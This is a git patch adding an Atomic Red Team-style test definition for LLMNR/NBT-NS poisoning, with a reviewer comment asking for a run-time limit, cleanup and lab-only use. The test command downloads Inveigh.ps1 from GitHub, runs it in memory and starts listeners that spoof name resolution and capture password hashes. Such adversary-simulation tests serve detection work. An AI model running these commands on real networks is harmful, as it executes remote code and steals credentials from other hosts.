From 4e55b364f73093eac396e17de8202bfeda2e180a Mon Sep 17 00:00:00 2001
From: Scot Pfeffer <45760923+scotp71@users.noreply.github.com>
Date: Wed, 26 Jan 2022 15:13:20 -0500
Subject: [PATCH] Create T1557.001 yaml (#1743)
Co-authored-by: Carrie Roberts
---
atomics/T1557.001/T1557.001.yaml | 14 ++++++++++++++
1 file changed, 14 insertions(+)
create mode 100644 atomics/T1557.001/T1557.001.yaml
diff --git a/atomics/T1557.001/T1557.001.yaml b/atomics/T1557.001/T1557.001.yaml
new file mode 100644
index 00000000..06e28b69
--- /dev/null
+++ b/atomics/T1557.001/T1557.001.yaml
@@ -0,0 +1,14 @@
+attack_technique: T1557.001
+display_name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
+atomic_tests:
+- name: LLMNR Poisoning with Inveigh (PowerShell)
+ description: 'Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. This Atomic will run continuously until you cancel it or it times out.'
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (iwr "https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1" -UseBasicParsing)
+ Invoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y
+ name: powershell
+ elevation_required: true
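Review bot: The `Invoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y` line has no run-time bound and the executor has no `cleanup_command`, so the poisoner keeps answering name queries until someone stops it by hand. Inveigh accepts a `-RunTime` value in minutes, so something like `Invoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y -RunTime 1` would make the test self-terminating. If I recall the Inveigh documentation correctly, `-HTTPS Y` installs a certificate in the local store and binds port 443, both of which can be left behind after an ungraceful exit, so a cleanup step that removes them is worth adding and verifying. The description should also state that the listeners respond to other hosts on the segment and that captured hashes are printed to the console, so the test belongs on an isolated lab network and its output should be handled as credential material. The test name says LLMNR only while the command also enables NBNS, mDNS, HTTPS and proxy listeners; either the name or the flags should be narrowed so that detections are validated against what actually runs.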